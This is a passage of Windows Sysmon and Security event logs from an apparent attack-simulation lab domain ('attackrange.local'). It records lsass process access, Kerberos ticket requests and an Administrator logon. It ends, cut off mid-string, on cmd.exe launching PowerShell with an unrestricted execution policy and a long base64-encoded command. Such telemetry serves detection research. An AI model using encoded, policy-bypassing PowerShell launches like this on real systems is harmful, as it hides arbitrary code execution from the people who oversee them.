06:55:17.009","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","SourceProcessId":"1336","SourceThreadId":"1048","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-11D4-5F25-0000-00108D0B0800}","TargetProcessId":"3140","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x40","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\winrscmd.dll+8d36|C:\\Windows\\system32\\winrscmd.dll+92d5|C:\\Windows\\system32\\winrscmd.dll+af31|C:\\Windows\\system32\\winrscmd.dll+23dc|c:\\windows\\system32\\wsmsvc.dll+155ac7|c:\\windows\\system32\\wsmsvc.dll+13f76d|c:\\windows\\system32\\wsmsvc.dll+13f3cf|c:\\windows\\system32\\wsmsvc.dll+13fcb2|c:\\windows\\system32\\wsmsvc.dll+9ab10|c:\\windows\\system32\\wsmsvc.dll+9b611|c:\\windows\\system32\\wsmsvc.dll+4495|c:\\windows\\system32\\wsmsvc.dll+16816c|c:\\windows\\system32\\wsmsvc.dll+1689b8|c:\\windows\\system32\\wsmsvc.dll+16345b|c:\\windows\\system32\\wsmsvc.dll+163125|c:\\windows\\system32\\wsmsvc.dll+14ce9c|c:\\windows\\system32\\wsmsvc.dll+130049|c:\\windows\\system32\\wsmsvc.dll+13571a|c:\\windows\\system32\\wsmsvc.dll+12f47e|c:\\windows\\system32\\wsmsvc.dll+125587|c:\\windows\\system32\\wsmsvc.dll+11f562|c:\\windows\\system32\\wsmsvc.dll+124574","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5499,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.009\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.009","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220577,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-634332812-1885290706-2582043485-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220578,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{BA6138E8-AAC0-A83A-70FC-5DED811F88B9}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-8400769$\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-8400769$","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{BA6138E8-AAC0-A83A-70FC-5DED811F88B9}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220579,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{BA6138E8-AAC0-A83A-70FC-5DED811F88B9}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{BA6138E8-AAC0-A83A-70FC-5DED811F88B9}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220580,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x80E22\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{BA6138E8-AAC0-A83A-70FC-5DED811F88B9}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-8400769\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x80e22","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-8400769","LogonGuid":"{BA6138E8-AAC0-A83A-70FC-5DED811F88B9}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220581,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x80E22\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x80e22","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5500,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.025\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.025","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5501,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.025\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.025","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5502,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.027\r\nProcessGuid: {E2A3D6B1-11D5-5F25-0000-0010550E0800}\r\nProcessId: 4992\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcA